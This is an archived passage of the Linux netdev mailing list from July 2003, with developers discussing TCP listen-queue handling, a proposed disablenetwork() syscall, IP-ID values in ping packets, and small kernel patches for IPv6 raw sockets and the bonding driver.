<001a01c3441c$6fe111a0$6801a8c0@oemcomputer> <3F08B7E2.7040208@us.ibm.com> <000d01c3444f$e6439600$6801a8c0@oemcomputer> <3F090A4F.10004@us.ibm.com> Subject: Re: question about linux tcp request queue handling MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 X-archive-position: 3812 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: palbrecht@qwest.net Precedence: bulk X-list: netdev Nivedita Singhvi writes: > > Again, you're limiting the number of connection requests > that are allowed to wait in the *accept* queue, where > we move to once we're ESTABLISHED.
You aren't limiting > a request sitting in the SYN queue. > This statement is inconsistent with the description of this scenario in Steven's TCP/IP Illustrated. Specifically, continuing the handshake in the TCP layer, i.e., sending a syn/ack and moving to the syn_recd state, is incorrect if the limit of the server's socket backlog would be exceeded. How do you account for this discrepancy between linux and other berkeley-derived implementations? From ak@suse.de Mon Jul 7 14:48:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 14:48:25 -0700 (PDT) Received: from Cantor.suse.de (ns.suse.de [213.95.15.193]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67LmH2x008869 for ; Mon, 7 Jul 2003 14:48:20 -0700 Received: from Hermes.suse.de (Hermes.suse.de [213.95.15.136]) by Cantor.suse.de (Postfix) with ESMTP id E33DF15089; Mon, 7 Jul 2003 23:48:11 +0200 (MEST) X-Authentication-Warning: oldwotan.suse.de: ak set sender to ak@suse.de using -f To: "Paul Albrecht" Cc: niv@us.ibm.com, linux-kernel@vger.kernel.org, "netdev" Subject: Re: question about linux tcp request queue handling References: <3F08858E.8000907@us.ibm.com.suse.lists.linux.kernel> <001a01c3441c$6fe111a0$6801a8c0@oemcomputer.suse.lists.linux.kernel> <3F08B7E2.7040208@us.ibm.com.suse.lists.linux.kernel> <000d01c3444f$e6439600$6801a8c0@oemcomputer.suse.lists.linux.kernel> <3F090A4F.10004@us.ibm.com.suse.lists.linux.kernel> <001401c344df$ccbc63c0$6801a8c0@oemcomputer.suse.lists.linux.kernel> From: Andi Kleen Date: 07 Jul 2003 23:48:10 +0200 In-Reply-To: <001401c344df$ccbc63c0$6801a8c0@oemcomputer.suse.lists.linux.kernel> Message-ID: Lines: 14 User-Agent: Gnus/5.09 (Gnus v5.9.0) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-archive-position: 3813 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ak@suse.de Precedence: bulk X-list: netdev "Paul Albrecht" writes: > This statement is inconsistent with
the description of this scenario in > Steven's TCP/IP Illustrated. Specifically, continuing the handshake in the > TCP layer, i.e., sending a syn/ack and moving to the syn_recd state, is > incorrect if the limit of the server's socket backlog would be exceeded. > How do you account for this discrepancy between linux and other > berkeley-derived implementations? The 4.4BSD-Lite code described in Stevens is long outdated. All modern BSDs (and probably most other Unixes too) do it in a similar way to what Nivedita described. The keywords are "syn flood attack" and "DoS". -Andi From doug@wireboard.com Mon Jul 7 15:25:28 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 15:25:38 -0700 (PDT) Received: from varsoon.wireboard.com (www.wireboard.com [216.151.155.101]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67MPQ2x009417 for ; Mon, 7 Jul 2003 15:25:27 -0700 Received: from doug by varsoon.wireboard.com with local (Exim 3.35 #1) id 19ZeQ9-0002nB-00; Mon, 07 Jul 2003 18:25:17 -0400 To: Andi Kleen Cc: "Paul Albrecht" , niv@us.ibm.com, linux-kernel@vger.kernel.org, "netdev" Subject: Re: question about linux tcp request queue handling References: <3F08858E.8000907@us.ibm.com.suse.lists.linux.kernel> <001a01c3441c$6fe111a0$6801a8c0@oemcomputer.suse.lists.linux.kernel> <3F08B7E2.7040208@us.ibm.com.suse.lists.linux.kernel> <000d01c3444f$e6439600$6801a8c0@oemcomputer.suse.lists.linux.kernel> <3F090A4F.10004@us.ibm.com.suse.lists.linux.kernel> <001401c344df$ccbc63c0$6801a8c0@oemcomputer.suse.lists.linux.kernel> From: Doug McNaught Date: 07 Jul 2003 18:25:17 -0400 In-Reply-To: Andi Kleen's message of "07 Jul 2003 23:48:10 +0200" Message-ID: Lines: 19 User-Agent: Gnus/5.0806 (Gnus v5.8.6) Emacs/20.7 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-archive-position: 3814 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: doug@mcnaught.org Precedence: bulk X-list: netdev Andi 
Kleen writes: > "Paul Albrecht" writes: > > > This statement is inconsistent with the description of this scenario in > > Steven's TCP/IP Illustrated. Specifically, continuing the handshake in the > > TCP layer, i.e., sending a syn/ack and moving to the syn_recd state, is > > incorrect if the limit of the server's socket backlog would be exceeded. > > How do you account for this discrepancy between linux and other > > berkeley-derived implementations? > > The 4.4BSD-Lite code described in Stevens is long outdated. All modern > BSDs (and probably most other Unixes too) do it in a similar way to what > Nivedita described. The keywords are "syn flood attack" and "DoS". And furthermore, IIRC, the current Linux networking code is not Berkeley-derived, though an earlier version was. -Doug From acme@conectiva.com.br Mon Jul 7 16:01:07 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 16:01:11 -0700 (PDT) Received: from orion.netbank.com.br (orion.netbank.com.br [200.203.199.90]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67N152x009965 for ; Mon, 7 Jul 2003 16:01:06 -0700 Received: from [200.181.170.115] (helo=brinquendo.conectiva.com.br) by orion.netbank.com.br with asmtp (Exim 3.33 #1) id 19Zf1Z-00012Q-00; Mon, 07 Jul 2003 20:03:57 -0300 Received: by brinquendo.conectiva.com.br (Postfix, from userid 500) id 36CBC1966C; Mon, 7 Jul 2003 22:33:35 +0000 (UTC) Date: Mon, 7 Jul 2003 19:33:35 -0300 From: Arnaldo Carvalho de Melo To: Pekka Savola Cc: Jeff Garzik , netdev@oss.sgi.com Subject: Re: disablenetwork() syscall? Message-ID: <20030707223334.GG5292@conectiva.com.br> References: <20030707194657.GA11328@gtf.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: X-Url: http://advogato.org/person/acme Organization: Conectiva S.A. 
User-Agent: Mutt/1.5.4i X-archive-position: 3815 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: acme@conectiva.com.br Precedence: bulk X-list: netdev On Mon, Jul 07, 2003 at 10:52:15PM +0300, Pekka Savola wrote: > On Mon, 7 Jul 2003, Jeff Garzik wrote: > > On Mon, Jul 07, 2003 at 10:40:02PM +0300, Pekka Savola wrote: > > > In a bugtraq thread, DJ Bernstein brought up an idea which I'm not sure > > > has been brought up in the past. I'm not sure whether it's feasible or > > > not, but at least it (and other methods to limit the functions of a > > > user-level code) might bear consideration. > > > > What about some URLs to what you are describing? > > > > The most information you provided was in $subject, whose content > > makes me a bit leery... > > Well, apart from the post scriptum, there was very little content about > the feature/idea :-), and the details would seem to be up for everyone's > imagination. > > FWIW, the body of the message is below: That is incomplete; here is the part where he mentions the disablenetwork() syscall: ------------------------------------- 8< ------------------------------ P.S. It's hard for a portable chroot tool to cut off a program's network access. Kernel designers should provide a disablenetwork() syscall, with the disabling inherited by children. Other kernel changes would be nice, but disablenetwork() is the only critical change.
------------------------------------- 8< ------------------------------ From ak@suse.de Mon Jul 7 16:52:10 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 16:52:19 -0700 (PDT) Received: from Cantor.suse.de (ns.suse.de [213.95.15.193]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67Nq82x010571 for ; Mon, 7 Jul 2003 16:52:09 -0700 Received: from Hermes.suse.de (Hermes.suse.de [213.95.15.136]) by Cantor.suse.de (Postfix) with ESMTP id 80B8A144E5; Tue, 8 Jul 2003 01:52:03 +0200 (MEST) Date: Tue, 8 Jul 2003 01:52:01 +0200 From: Andi Kleen To: Doug McNaught Cc: palbrecht@qwest.net, niv@us.ibm.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: question about linux tcp request queue handling Message-Id: <20030708015201.4a5ad7e6.ak@suse.de> In-Reply-To: References: <3F08858E.8000907@us.ibm.com.suse.lists.linux.kernel> <001a01c3441c$6fe111a0$6801a8c0@oemcomputer.suse.lists.linux.kernel> <3F08B7E2.7040208@us.ibm.com.suse.lists.linux.kernel> <000d01c3444f$e6439600$6801a8c0@oemcomputer.suse.lists.linux.kernel> <3F090A4F.10004@us.ibm.com.suse.lists.linux.kernel> <001401c344df$ccbc63c0$6801a8c0@oemcomputer.suse.lists.linux.kernel> X-Mailer: Sylpheed version 0.8.9 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3816 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ak@suse.de Precedence: bulk X-list: netdev On 07 Jul 2003 18:25:17 -0400 Doug McNaught wrote: > And furthermore, IIRC, the current Linux networking code is not > Berkeley-derived, though an earlier version was. The linux network stack was never BSD derived in any way. 
[there are two header files that came from net2, but they do not contain any code] -Andi From jmorris@intercode.com.au Mon Jul 7 16:59:46 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 16:59:50 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:0SE68HI0BZK1XMeIREV1bZehjFUCwaYg@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67Nxh2x010902 for ; Mon, 7 Jul 2003 16:59:44 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h67NxWr15959; Tue, 8 Jul 2003 09:59:33 +1000 Date: Tue, 8 Jul 2003 09:59:32 +1000 (EST) From: James Morris To: Pekka Savola cc: netdev@oss.sgi.com Subject: Re: disablenetwork() syscall? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3817 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev On Mon, 7 Jul 2003, Pekka Savola wrote: > Hi, > > In a bugtraq thread, DJ Bernstein brought up an idea which I'm not sure > has been brought up in the past. Such a feature already exists in SELinux. > I'm not sure whether it's feasible or > not, but at least it (and other methods to limit the functions of a > user-level code) might bear consideration. This is precisely what LSM is for, so new security models can be implemented without any direct effect on the core kernel. 
- James -- James Morris From doug@wireboard.com Mon Jul 7 17:18:04 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 17:18:14 -0700 (PDT) Received: from varsoon.wireboard.com (www.wireboard.com [216.151.155.101]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h680I32x011336 for ; Mon, 7 Jul 2003 17:18:04 -0700 Received: from doug by varsoon.wireboard.com with local (Exim 3.35 #1) id 19ZgBB-00031R-00; Mon, 07 Jul 2003 20:17:57 -0400 To: Andi Kleen Cc: palbrecht@qwest.net, niv@us.ibm.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: question about linux tcp request queue handling References: <3F08858E.8000907@us.ibm.com.suse.lists.linux.kernel> <001a01c3441c$6fe111a0$6801a8c0@oemcomputer.suse.lists.linux.kernel> <3F08B7E2.7040208@us.ibm.com.suse.lists.linux.kernel> <000d01c3444f$e6439600$6801a8c0@oemcomputer.suse.lists.linux.kernel> <3F090A4F.10004@us.ibm.com.suse.lists.linux.kernel> <001401c344df$ccbc63c0$6801a8c0@oemcomputer.suse.lists.linux.kernel> <20030708015201.4a5ad7e6.ak@suse.de> From: Doug McNaught Date: 07 Jul 2003 20:17:57 -0400 In-Reply-To: Andi Kleen's message of "Tue, 8 Jul 2003 01:52:01 +0200" Message-ID: Lines: 20 User-Agent: Gnus/5.0806 (Gnus v5.8.6) Emacs/20.7 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-archive-position: 3818 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: doug@mcnaught.org Precedence: bulk X-list: netdev Andi Kleen writes: > On 07 Jul 2003 18:25:17 -0400 > Doug McNaught wrote: > > > And furthermore, IIRC, the current Linux networking code is not > > Berkeley-derived, though an earlier version was. > > The linux network stack was never BSD derived in any way. > > [there are two header files that came from net2, but they do not > contain any code] OIDNRC, thanks for the correction. 
:) Although, I distinctly remember seeing "Net-2" in one of the boot messages in an early kernel (pre 1.0); was that just the header files' doing? -Doug From ak@suse.de Mon Jul 7 17:25:15 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 17:25:19 -0700 (PDT) Received: from Cantor.suse.de (ns.suse.de [213.95.15.193]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h680PE2x011664 for ; Mon, 7 Jul 2003 17:25:14 -0700 Received: from Hermes.suse.de (Hermes.suse.de [213.95.15.136]) by Cantor.suse.de (Postfix) with ESMTP id B289E14E0A; Tue, 8 Jul 2003 02:25:08 +0200 (MEST) Date: Tue, 8 Jul 2003 02:25:07 +0200 From: Andi Kleen To: Doug McNaught Cc: palbrecht@qwest.net, niv@us.ibm.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: question about linux tcp request queue handling Message-Id: <20030708022507.0c9f439b.ak@suse.de> In-Reply-To: References: <3F08858E.8000907@us.ibm.com.suse.lists.linux.kernel> <001a01c3441c$6fe111a0$6801a8c0@oemcomputer.suse.lists.linux.kernel> <3F08B7E2.7040208@us.ibm.com.suse.lists.linux.kernel> <000d01c3444f$e6439600$6801a8c0@oemcomputer.suse.lists.linux.kernel> <3F090A4F.10004@us.ibm.com.suse.lists.linux.kernel> <001401c344df$ccbc63c0$6801a8c0@oemcomputer.suse.lists.linux.kernel> <20030708015201.4a5ad7e6.ak@suse.de> X-Mailer: Sylpheed version 0.8.9 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3819 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ak@suse.de Precedence: bulk X-list: netdev On 07 Jul 2003 20:17:57 -0400 Doug McNaught wrote: > Although, I distinctly remember seeing "Net-2" in one of the boot > messages in an early kernel (pre 1.0); was that just the header files' > doing? Net-2 was the name for a linux network code release too. The current code is net4 (actually more net5).
But it has nothing to do with the similarly named BSD release. -Andi From kohei@cysols.com Mon Jul 7 18:58:57 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 18:59:06 -0700 (PDT) Received: from geto.cysol.co.jp (geto.cysol.co.jp [210.233.3.227]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h681wu2x013338 for ; Mon, 7 Jul 2003 18:58:57 -0700 Received: from cysols.com (agari2.priv.cysol.co.jp [192.168.0.249]) by geto.cysol.co.jp (8.12.9/3.7W) with ESMTP id h681wlwQ011322; Tue, 8 Jul 2003 10:58:48 +0900 (JST) Message-ID: <3F0A2564.6030003@cysols.com> Date: Tue, 08 Jul 2003 10:59:00 +0900 From: Kohei OHTA User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.4) Gecko/20030624 Netscape/7.1 (ax) X-Accept-Language: ja MIME-Version: 1.0 To: Ulisses CC: netdev@oss.sgi.com Subject: Re: IP-ID field of ICMP echo request References: <3F095B7B.5090203@cysols.com> <1057603237.1001.18.camel@ryback> In-Reply-To: <1057603237.1001.18.camel@ryback> X-Enigmail-Version: 0.76.1.0 X-Enigmail-Supports: pgp-inline, pgp-mime Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3820 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kohei@cysols.com Precedence: bulk X-list: netdev Ulisses, Thanks for your helpful information. I understood the reason. The article pointed by you says "Linux 2.4 also uses peer-specific IPID values (see net/ipv4/inetpeer.c)." That is great. Kohei. >>I found a strange packet, which is generated by ping of Linux. >>It is observed ID field of IP header in ping packet (Echo request) is always 0. >> >>I confirmed this on kernel 2.4.18 and 2.4.21. >>My colleague also confirmed this is fixed in kernel 2.5.74. >> >>I hope this is fixed in next next 2.4.x release. > > Hi, Kohei, > > I guess this behaviour is to prevent Idle scanning, that is based on > predictable IPID numbers [1]. 
Therefore, the Linux TCP/IP stack uses 0 > as IPID when the DF (Don't Fragment) bit is set. I'm not sure, but I > think that Linux also uses peer-specific IPID numbers to make the > prediction harder. > > -- Ulisses > > [1] http://www.insecure.org/nmap/idlescan.html > > > From palbrecht@qwest.net Mon Jul 7 19:18:09 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 19:18:24 -0700 (PDT) Received: from mpls-qmqp-02.inet.qwest.net (mpls-qmqp-02.inet.qwest.net [63.231.195.113]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h682I82x013852 for ; Mon, 7 Jul 2003 19:18:09 -0700 Received: (qmail 75219 invoked by uid 0); 8 Jul 2003 01:45:28 -0000 Received: from mpls-pop-14.inet.qwest.net (63.231.195.14) by mpls-qmqp-02.inet.qwest.net with QMQP; 8 Jul 2003 01:45:28 -0000 Received: from 0-2pool145-162.nas8.minneapolis1.mn.us.da.qwest.net (HELO oemcomputer) (67.4.145.162) by mpls-pop-14.inet.qwest.net with SMTP; 8 Jul 2003 02:18:06 -0000 Date: Mon, 7 Jul 2003 21:14:48 -0700 Message-ID: <001501c34507$7a19baa0$6801a8c0@oemcomputer> From: "Paul Albrecht" To: "Andi Kleen" Cc: niv@us.ibm.com, linux-kernel@vger.kernel.org, "netdev" References: <3F08858E.8000907@us.ibm.com.suse.lists.linux.kernel><001a01c3441c$6fe111a0$6801a8c0@oemcomputer.suse.lists.linux.kernel><3F08B7E2.7040208@us.ibm.com.suse.lists.linux.kernel><000d01c3444f$e6439600$6801a8c0@oemcomputer.suse.lists.linux.kernel><3F090A4F.10004@us.ibm.com.suse.lists.linux.kernel><001401c344df$ccbc63c0$6801a8c0@oemcomputer.suse.lists.linux.kernel> Subject: Re: question about linux tcp request queue handling MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 X-archive-position: 3821 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: palbrecht@qwest.net 
Precedence: bulk X-list: netdev Andi Kleen writes: > > The 4.4BSD-Lite code described in Stevens is long outdated. > I was referring to volume one subtitled: "The Protocols." It doesn't describe implementation and the examples are not limited to bsd-lite. > >All modern BSDs (and probably most other Unixes too) do it in a similar way to what > Nivedita described. > Linux doesn't operate in the manner Nivedita describes ... the tcp layer on the server side moves to the syn_recd state, but doesn't accept the ack back from client. Instead it times out and sends its syn/ack back to the client and again ignores the client's ack, ... Eventually, either there's room on backlog queue and the server side moves to the established state or the server side stops resending its syn/ack. This doesn't seem to make much sense. If the tcp layer can send the syn/ack it seems like it should probably respond to the client's ack. > >The keywords are "syn flood attack" and "DoS". > I'd be interested in a more specific reference detailing the changes required to the listen syscall as a consequence of the changes required for avoidance of syn flood attacks. Thanks.
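The behaviour described in the message above (SYN always answered, the client's final ACK ignored while the backlog is full, SYN/ACK retransmitted until room appears or the retries run out) can be written down as a small state model. This is a toy sketch of the observation as reported in this thread, not kernel code: the struct and function names, the retry limit field, and the exact "full" comparison are all assumptions made for illustration.

```c
/* Toy model of the listen-queue behaviour described in the thread.
 * All names here are hypothetical; nothing is taken from the kernel. */
#include <stdbool.h>

enum conn_state { CONN_SYN_RECV, CONN_ESTABLISHED, CONN_DROPPED };

struct listener {
    int backlog;            /* listen() backlog: limit on the accept queue */
    int accept_queued;      /* established connections awaiting accept()   */
    int max_synack_retries; /* assumed cap on SYN/ACK retransmissions      */
};

struct request {
    enum conn_state state;
    int synack_retries;     /* SYN/ACK retransmissions sent so far */
};

/* A SYN arrives: the model always answers with a SYN/ACK. */
void on_syn(struct request *req)
{
    req->state = CONN_SYN_RECV;
    req->synack_retries = 0;
}

/* The client's ACK arrives. It is ignored while the accept queue is full,
 * so the request stays in SYN_RECV. Returns true if it was accepted. */
bool on_ack(struct listener *l, struct request *req)
{
    if (req->state != CONN_SYN_RECV)
        return false;
    if (l->accept_queued >= l->backlog)
        return false;
    l->accept_queued++;
    req->state = CONN_ESTABLISHED;
    return true;
}

/* The retransmit timer fires: resend the SYN/ACK, or give up. */
void on_timer(const struct listener *l, struct request *req)
{
    if (req->state != CONN_SYN_RECV)
        return;
    if (req->synack_retries >= l->max_synack_retries)
        req->state = CONN_DROPPED;
    else
        req->synack_retries++;
}

/* The application calls accept(): one slot in the accept queue frees up. */
bool do_accept(struct listener *l)
{
    if (l->accept_queued == 0)
        return false;
    l->accept_queued--;
    return true;
}
```

In this model the backlog bounds only the accept queue, which is the point Nivedita makes; a request whose ACK was ignored completes later if accept() frees a slot before its retries are exhausted.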
From yoshfuji@linux-ipv6.org Tue Jul 8 06:17:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 06:17:25 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68DHD2x027872 for ; Tue, 8 Jul 2003 06:17:15 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h68DIYBo016349; Tue, 8 Jul 2003 22:18:35 +0900 Date: Tue, 08 Jul 2003 22:18:34 +0900 (JST) Message-Id: <20030708.221834.127574909.yoshfuji@linux-ipv6.org> To: davem@redhat.com, jmorris@intercode.com.au CC: netdev@oss.sgi.com, Thomas Graf , yoshfuji@linux-ipv6.org Subject: [PATCH] IPV6: Fix BUG when appending destination options headers From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3822 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev Hello. This patch fixes BUG when pushing IPv6 destination options over an IPv6 raw socket. Patch is based on one from Thomas Graf . 
Index: linux-2.5/net/ipv6/ip6_output.c
===================================================================
RCS file: /home/cvs/linux-2.5/net/ipv6/ip6_output.c,v
retrieving revision 1.32
diff -u -r1.32 ip6_output.c
--- linux-2.5/net/ipv6/ip6_output.c 1 Jul 2003 00:57:19 -0000 1.32
+++ linux-2.5/net/ipv6/ip6_output.c 8 Jul 2003 11:55:33 -0000
@@ -1239,7 +1239,6 @@
 memcpy(np->cork.opt, opt, opt->tot_len);
 inet->cork.flags |= IPCORK_OPT;
 /* need source address above miyazawa*/
- exthdrlen += opt->opt_flen ? opt->opt_flen : 0;
 }
 dst_hold(&rt->u.dst);
 np->cork.rt = rt;
@@ -1252,6 +1251,7 @@
 length += exthdrlen;
 transhdrlen += exthdrlen;
 }
+ exthdrlen += opt ? opt->opt_flen : 0;
 } else {
 rt = np->cork.rt;
 if (inet->cork.flags & IPCORK_OPT)
Index: linux-2.5/net/ipv6/raw.c
===================================================================
RCS file: /home/cvs/linux-2.5/net/ipv6/raw.c,v
retrieving revision 1.32
diff -u -r1.32 raw.c
--- linux-2.5/net/ipv6/raw.c 7 Jul 2003 02:28:36 -0000 1.32
+++ linux-2.5/net/ipv6/raw.c 8 Jul 2003 11:55:33 -0000
@@ -624,6 +624,7 @@
 if (msg->msg_controllen) {
 opt = &opt_space;
 memset(opt, 0, sizeof(struct ipv6_txoptions));
+ opt->tot_len = sizeof(struct ipv6_txoptions);
 
 err = datagram_send_ctl(msg, &fl, opt, &hlimit);
 if (err < 0) {

--
Hideaki YOSHIFUJI @ USAGI Project
GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA

From shmulik.hen@intel.com Tue Jul 8 06:40:46 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 06:40:57 -0700 (PDT) Received: from caduceus.jf.intel.com (fmr06.intel.com [134.134.136.7]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68Dej2x028784 for ; Tue, 8 Jul 2003 06:40:46 -0700 Received: from talaria.jf.intel.com (talaria.jf.intel.com [10.7.209.7]) by caduceus.jf.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h68DZ0609629 for ; Tue, 8 Jul 2003 13:35:00 GMT Received: from orsmsxvs040.jf.intel.com (orsmsxvs040.jf.intel.com [192.168.65.206]) by
talaria.jf.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h68D6WR26138 for ; Tue, 8 Jul 2003 13:06:32 GMT Received: from jrslxjul1.npdj.intel.com ([10.12.254.186]) by orsmsxvs040.jf.intel.com (NAVGW 2.5.2.11) with SMTP id M2003070806515419980 ; Tue, 08 Jul 2003 06:51:57 -0700 Date: Tue, 8 Jul 2003 16:40:33 +0300 (IDT) From: Shmulik Hen X-X-Sender: Reply-To: Shmulik Hen To: Jeff Garzik cc: linux-netdev , Amir Noam , bond-devel , Jay Vosburgh , Noam Marom , Shmulik Hen , "Chad N. Tindel" , Tsippy Mendelson Subject: [patch][bonding] fix arp targets' addresses initialization In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="202029822-1412134829-1057671633=:8183" X-archive-position: 3823 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shmulik.hen@intel.com Precedence: bulk X-list: netdev This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --202029822-1412134829-1057671633=:8183 Content-Type: TEXT/PLAIN; charset=US-ASCII Hi, The recent patch to bonding that made it use the standard in_aton() function introduced a bug. The converted IP addresses are saved in the wrong array, thus no ARPs are sent at all to any of the addresses specified. Attached patches are against latest net-drivers 2.4 and 2.5 trees. -- | Shmulik Hen | | Israel Design Center (Jerusalem) | | LAN Access Division | | Intel Communications Group, Intel corp. 
| --202029822-1412134829-1057671633=:8183 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="patch-2.4.diff" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: patch-2.4.diff Content-Disposition: attachment; filename="patch-2.4.diff" ZGlmZiAtTnVhcnAgbmV0LWRyaXZlcnMtMi40L2RyaXZlcnMvbmV0L2JvbmRp bmcvYm9uZF9tYWluLmMgbmV0LWRyaXZlcnMtMi40LWRldmVsL2RyaXZlcnMv bmV0L2JvbmRpbmcvYm9uZF9tYWluLmMNCi0tLSBuZXQtZHJpdmVycy0yLjQv ZHJpdmVycy9uZXQvYm9uZGluZy9ib25kX21haW4uYwlUdWUgSnVsICA4IDE2 OjI1OjM2IDIwMDMNCisrKyBuZXQtZHJpdmVycy0yLjQtZGV2ZWwvZHJpdmVy cy9uZXQvYm9uZGluZy9ib25kX21haW4uYwlUdWUgSnVsICA4IDE2OjI1OjM3 IDIwMDMNCkBAIC00NjAsNyArNDYwLDcgQEAgc3RydWN0IGJvbmRfcGFybV90 Ymwgew0KIA0KIHN0YXRpYyBpbnQgYXJwX2ludGVydmFsID0gQk9ORF9MSU5L X0FSUF9JTlRFUlY7DQogc3RhdGljIGNoYXIgKmFycF9pcF90YXJnZXRbTUFY X0FSUF9JUF9UQVJHRVRTXSA9IHsgTlVMTCwgfTsNCi1zdGF0aWMgdW5zaWdu ZWQgbG9uZyBhcnBfdGFyZ2V0W01BWF9BUlBfSVBfVEFSR0VUU10gPSB7IDAs 